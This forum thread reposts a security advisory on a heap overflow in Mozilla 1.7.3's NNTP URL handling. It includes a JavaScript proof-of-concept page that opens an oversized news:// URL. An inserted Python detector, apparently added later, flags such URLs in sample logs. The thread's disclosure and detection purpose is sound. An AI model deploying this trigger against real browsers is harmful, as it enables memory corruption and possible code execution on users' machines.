Heap overflow in Mozilla Browser

  1. #1
    AO French Antique News Whore

    Heap overflow in Mozilla Browser

    Issue:
    ======

    A critical security vulnerability has been found in the Mozilla Project code handling the NNTP protocol.

    Details:
    ========

    The Mozilla browser supports NNTP URLs. A remote site is able to trigger a news:// connection to any server. I found a flaw in the NNTP handling code which may cause a heap overflow and allow a remote attacker to execute arbitrary code on the client machine.

    Affected Versions
    =================

    Mozilla Browser <= 1.7.3 with mozilla-mail

    Solution
    =========

    This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan Veditz claims that it cannot be exploited: "A '\' on the end will certainly trash memory, but at that point you're no longer reading attacker-supplied data;".

    On my RedHat 9.0 with Mozilla 1.7.3 the attached proof of concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because the Mozilla Team hasn't warned users.

    Proof of Concept
    ================
    <html>
    <script>
    i = "news://news.individual.net/AAAAAAAAAAAAAA?";
    for(l = 0; l < 16376; l++)
        i=i+"A";
    i=i+"/?profile/";
    for(l = 0; l < 16384; l++)
        i=i+"A";
    i=i+"\\";
    window.open(i);
    </script>
    </html>
    Source : http://www.securityfocus.com/archive...7/2005-01-02/0
    Source : http://www.k-otik.com/bugtraq/bulletins/878
    -Simon "SDK"
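A defender-side check for the URL shape described in the post, as an added example (not from the original post or the Mozilla project): it flags news:// URLs carrying oversized path components or a trailing backslash, run over constructed log lines. The MAX_COMPONENT threshold, the log format and the function names are my own assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

NEWS_SCHEMES = {"news", "nntp", "snews"}
MAX_COMPONENT = 1024  # assumed sane upper bound; real group/article names are far shorter


def news_url_findings(url: str) -> list[str]:
    """Return the reasons a news:// URL resembles the overflow trigger; [] if it looks benign."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in NEWS_SCHEMES:
        return []  # only NNTP-family URLs reach the affected code path
    # Mozilla treats everything after the host as group/article/command text,
    # so rejoin path and query and inspect each '/'- or '?'-delimited piece.
    tail = parts.path + ("?" + parts.query if parts.query else "")
    tail = unquote(tail)  # percent-encoding must not hide the length or the backslash
    findings = []
    for piece in re.split(r"[/?]", tail):
        if len(piece) > MAX_COMPONENT:
            findings.append(f"component of {len(piece)} bytes exceeds {MAX_COMPONENT}")
    if tail.endswith("\\"):
        findings.append("trailing backslash (the final byte the PoC appends)")
    return findings


def flag_news_urls(lines):
    """Scan proxy log lines (assumed format: timestamp client verb URL) and return (line_no, findings) for hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in line.split():
            reasons = news_url_findings(token)
            if reasons:
                hits.append((n, reasons))
    return hits


# Constructed samples: one ordinary newsgroup URL and one shaped like the posted PoC.
SAMPLE_LOG = [
    "2005-01-02T10:00:00 client1 GET news://news.individual.net/comp.lang.c",
    "2005-01-02T10:00:05 client2 GET news://news.individual.net/AAAAAAAAAAAAAA?"
    + "A" * 16376 + "/?profile/" + "A" * 16384 + "\\",
]

if __name__ == "__main__":
    for line_no, reasons in flag_news_urls(SAMPLE_LOG):
        print(f"line {line_no}: {'; '.join(reasons)}")
```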

  2. #2
    Senior Member
    Luckily Firefox does not support the news: protocol, hence it won't be affected.

    Slarty
